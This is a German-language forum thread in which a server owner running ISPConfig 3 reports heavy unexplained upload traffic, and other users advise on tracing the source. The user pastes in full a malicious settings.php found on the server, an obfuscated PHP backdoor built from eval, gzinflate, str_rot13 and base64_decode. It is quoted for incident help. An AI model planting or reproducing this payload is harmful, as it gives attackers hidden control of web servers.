Serverangriff abwehren ?

JayDax

New Member
Hallo, ich habe einen Debian 4 Server mit ISPConfig 3 in Betrieb. Vor kurzem fing der Server an, grosse Datenmengen hochzuladen. Bis zu 30GB am Tag. Ich fand in einem Verzeichnis /var/www/clients/client1/web3 eine settings.php die nicht von mir erstellt wurde mit dem Inhalt:
<?php eval(gzinflate(str_rot13(base64_decode('DdFUsptXAEDR5fj9b0AUiGVsQI6tQBMEExehgRbQVXF29d9qCeeiLe9/mi8maJ8v6HRepr/TuLD8QpHPVRT+SagcK/TzWC/NqHstiqLoyolbKhs0zgeXnwgIziP+aZ6qstij+Eiccoun8vW0vU5ti78HTXi5zIQ10Ahupml7FbCMWBhF9Mvx/Lahu8KUY9VryYBSNdBGW7EQWsJ3MGMeqEce3hXiEr9mTp7KnyNmmCizj8QldUuNujB48BZAR2jYpfBSUDW3lHgf9KNC8rBjGri5VA9lTr8JKgaqPDb2ab7D9g1sfSTylrnJNLhjc+erfkRBfSa//LlBkQtzmsm7K28Xq7Tf8qIaFe6PtYIHr6Ma7exuf33BKvJi7UHAe8o+gcD3S0Bb1SMM21S8nBAaqGAAoi1ZRMopsipskbSGudhonGR6ZyNiWQ54WjcQXMfwlvpC8nOBa3s47f7CxebJ1zgYJS8x6lrpnY7My7acRYkhEe1s3LC3DMUfwWMFlMxeJsbQxUSqo12Xdjna1WPf0xlOuWDZlKouwuscl+Wcizmsh2oFqBX/OzoSQevjW/vP0Eo87f5nZGSgm9Tp/qjtl9KeC8vyXhQorcZ3+qbQb+8b60keK6wmYjAe7HhwELDV8GeQXe3RY1Xn4WZYQqMkqe3GrjkyphbajpbpScCWpsY7ny+UsqGa3wZDHz37XVP9aTXLJK/UwPSmC1jCjKfwPKsviKcS4I/z8MSny/O7rvX+AUTFuqyJ6PUj7PjUf11CcLJhRvXxiFE67QIY7LLCbWcD5n13jIKnITF65+NokBl6Oz1mhLNGGZ4/eKGQxbDuXCIOBRCyVcLcfX2wpwuDM1RXq8LPrK4Uhk3ixWbJfRI3EapdZYjoPAzuvjG39dlISU7ypuPNKRn5cn/byHOCGd/t9owLbYjeCb3Hk9k4rejO6pNawf5ncyeg+nw6vnZhC/QUU6QwocneG76lqFA0DPouov2I02SnwvRu9EeyXbE8akhUuKozy2V6nxe624/L+IwfTSFGNF0Te//z59d///r9Pw==')))); ?>

Hab das mal durch einen Encrypter gejagt. Ob diese Datei nun dafür Verantwortlich ist oder nicht ist mir erst einmal egal. Schlimmer finde ich, das die Datei dort erstellt wurde, obwohl ist sehr sichere Passworte benutze. Ich kann ja sehen, wann die Datei erstellt wurde, aber im Apache Log finde ich dazu nur:
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "GET /robots.txt HTTP/1.1" 404 1873 "-" "Link Valet Online 1.1"
207.36.201.119 - - [28/Jan/2011:02:48:44 +0100] "HEAD /settings.php HTTP/1.1" 404 0 "http://htmlhelp.com/tools/valet/linktest.cgi" "Link Valet Online 1.1"

Ich würde nun gerne herausfinden, welche Datei oder Prozess diesen Traffic verursacht. Kann man das herausfinden ?
Und kann man feststellen, wie die Datei in der Verzeichnis erstellt wurde ?

... habe die settings.php im messages log gefunden, sie wurde per ftp hochgeladen. Aber dort habe ich auch ein sicheres PW.
 
Zuletzt bearbeitet:

Rolli-Ronny

New Member
Ich würde mal sagen das dein FTP-Server eine Lücke hat anders hätte keiner darauf zugriff haben können oder aber jemand hat dein Passwort erraten können.Nutzt du proFTPd wenn ja welche Version?
 

Till

Administrator
Bist Du sicher dass es genau diese settings.php war (also mit dem Inhalt)? Hast Du mal die IP des hochladenden clients gecheckt, nur um ganz sicher zu gehen dass Du oder jemand der noch zugriff hat es nicht war von dem der Upload stammt?

Normalerweise passieren Hacks durch die laufende web anwendung, also das cms das in dem web läuft. Es kann also sein dass einfach nur der inhlat der settings.php ausgetauscht wurde, und es eben nichts mit dem FTP Upload zu tun hat.

Ansonsten kann Dein Passwort noch so sicher sein, wenn jemand über phishing dran gekommen ist oder Du es mal über ein nicht gesichertes Wlan oder im Internetcafe verwendet hast.

Ich würde nun gerne herausfinden, welche Datei oder Prozess diesen Traffic verursacht. Kann man das herausfinden ?

Checke mit top, welche Prozesse Last erzeugen. Außerdem kannst Du mit tools wie netstat sehen, welche Prozesse gerade welche Verbindungen offen halten.

Und kann man feststellen, wie die Datei in der Verzeichnis erstellt wurde ?

Nein. Nur wann und von wem bzw. wem sie jetzt gehört.

@Rolly-Ronny: Wenn er ispconfig 3 verwendet, dann kann es nur pure-ftpd sein, denn proftpd läuft nicht mit ispconfig 3.

Mir ist aktuell nichts bekannt zu neuen pure-ftpd bugs.
 

Werbung

Top